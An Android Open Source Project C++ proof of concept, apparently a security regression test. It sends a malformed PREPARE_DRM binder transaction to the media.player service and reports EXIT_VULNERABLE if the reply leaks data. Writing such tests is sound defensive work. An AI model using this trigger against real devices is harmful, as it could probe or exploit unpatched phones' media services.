1 /** 2 * Copyright (C) 2021 The Android Open Source Project 3 * 4 * Licensed under the Apache License, Version 2.0 (the "License"); 5 * you may not use this file except in compliance with the License. 6 * You may obtain a copy of the License at 7 * 8 * http://www.apache.org/licenses/LICENSE-2.0 9 * 10 * Unless required by applicable law or agreed to in writing, software 11 * distributed under the License is distributed on an "AS IS" BASIS, 12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 * See the License for the specific language governing permissions and 14 * limitations under the License. 15 */ 16 17 #include <binder/IServiceManager.h> 18 #include <media/mediaplayer.h> 19 #include "../includes/common.h" 20 21 #define PREPARE_DRM 39 22 23 using namespace android; 24 main()25int main() { 26 sp<IServiceManager> serviceManager = defaultServiceManager(); 27 if (serviceManager == nullptr) { 28 return EXIT_FAILURE; 29 } 30 31 sp<IBinder> mediaPlayerService = serviceManager->getService(String16("media.player")); 32 if (mediaPlayerService == nullptr) { 33 return EXIT_FAILURE; 34 } 35 36 sp<IMediaPlayerService> iMediaPlayerService = 37 IMediaPlayerService::asInterface(mediaPlayerService); 38 if (iMediaPlayerService == nullptr) { 39 return EXIT_FAILURE; 40 } 41 42 MediaPlayer *mediaPlayer = new MediaPlayer(); 43 if (mediaPlayer == nullptr) { 44 return EXIT_FAILURE; 45 } 46 47 sp<IMediaPlayer> iMediaPlayer = iMediaPlayerService->create(mediaPlayer); 48 if (iMediaPlayer == nullptr) { 49 delete (mediaPlayer); 50 return EXIT_FAILURE; 51 } 52 53 Parcel data, reply; 54 data.writeInterfaceToken(iMediaPlayer->getInterfaceDescriptor()); 55 const uint8_t arr[16] = {}; 56 data.write(arr, 16); 57 data.writeUint32(2); 58 data.writeUnpadded(arr, 1); 59 60 IMediaPlayer::asBinder(iMediaPlayer)->transact(PREPARE_DRM, data, &reply); 61 uint32_t size = 0; 62 reply.readUint32(&size); 63 64 delete (mediaPlayer); 65 return (size > 0) ? EXIT_VULNERABLE : EXIT_SUCCESS; 66 } 67